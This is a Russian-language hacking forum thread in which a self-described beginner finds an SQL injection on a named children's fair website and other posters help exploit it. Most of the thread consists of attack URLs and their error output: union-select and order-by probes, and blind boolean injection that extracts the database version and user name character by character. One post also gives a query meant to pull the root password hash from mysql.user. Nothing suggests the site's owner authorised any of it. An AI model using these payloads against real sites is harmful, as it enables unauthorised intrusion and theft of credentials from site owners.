Вообщем так, нашёл на сайте вроде бы явную sql-injection
при вставке кавычки возвращает
http://www.injection.com/?dept=62&pid=665'

You have an error in your SQL syntax near '\'' at line 1

Вставляю
http://www.injection.com/?dept=62&pid=-999+union+select+1/*
А отображается
You have an error in your SQL syntax near 'union select 1/*' at line 1

При проверке
http://www.injection.com/?dept=62&pid=666-1
Выдаёт страницу http://www.injection.com/?dept=62&pid=665
Что бы я не вводил, выводится запрос в тексте после +union
Что такое - не получается
Я только учусь и надёюсь на ваш ценный совет!

Полный линк на сайт в студию...

Полный линк на сайт в студию...
Пожалуйста! :)
http://www.mykidsfair.com/?dept=62&pi=665

ну тогда правильный линк
http://www.mykidsfair.com/?dept=62&pid=665

;)

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx

вот это тоже интересно...
http://www.mykidsfair.com/?dept=xxx
Круто! А я и не заметил, тогда сейчас попробую подобрать название колонки :)

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ? :)

http://www.mykidsfair.com/?dept=62+order+by+13--

на сайте стоит 3 версия мускула, это мы узнаем по 1 цифре след запроса
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(version(),1,1))) =51

а потом вытягиваем USER()
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),1,1)))=99
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),2,1)))=10 6
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),3,1)))=10 4
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),4,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),5,1)))=11 4
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),6,1)))=10 9
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),7,1)))=97
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),8,1)))=11 0
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),9,1)))=64
http://www.mykidsfair.com/?dept=62&pid=665+AND+ascii(lower(substring(user(),10,1)))=1 08

в итоге получаем char() кодировку имени юзера
99, 106, 104, 97, 114, 109, 97, 110, 64, 108(остановился на 108, так как по практике могу сказать что там идет localhost)

ps мазахисты могут еще повытягивать......

А что можно поиметь вот с этого сообщения

http://www.mykidsfair.com/?dept=-999+union+select+1,2/*

You have an error in your SQL syntax near 'union select 1,2/* AND page_class = 4' at line 1
Что за параметр page_class = 4 ?
в 3-м мускуле нету оператора union

Спасибо огромное всем!!! Просто я хакинг начал изучать только в начале декабре 2006 :)

а толку от этой скули?
можно узнать тока версию, юзера и название базы данных.

а толку от этой скули?
можно узнать тока версию, юзера и название базы данных.

теоритически можно узнать пароль юзера зная его логин. Так же нужно знать имя базы данных, таблицу и название колонки с паролем

вот пример

http://www.mykidsfair.com/?dept=62&pid=66+AND+ascii(lower(substring((select+password+ from+mysql.user+WHERE+user=char(114,111,111,116)+L IMIT+1),1,1)))>1

пароль берется из таблицы user находящ в базе mysql
Но сдесь базы mysql походу нет, и запрос соответственно не верный

>>теоритически можно узнать пароль юзера зная его логин. Так же нужно знать имя базы данных, таблицу и название колонки с паролем


в 3 версии нельзя использовать вложенный select

киби спорить не буду, так как на практике не доводилось сталкиваться с 3 версией
зы теперь буду знать, спасибо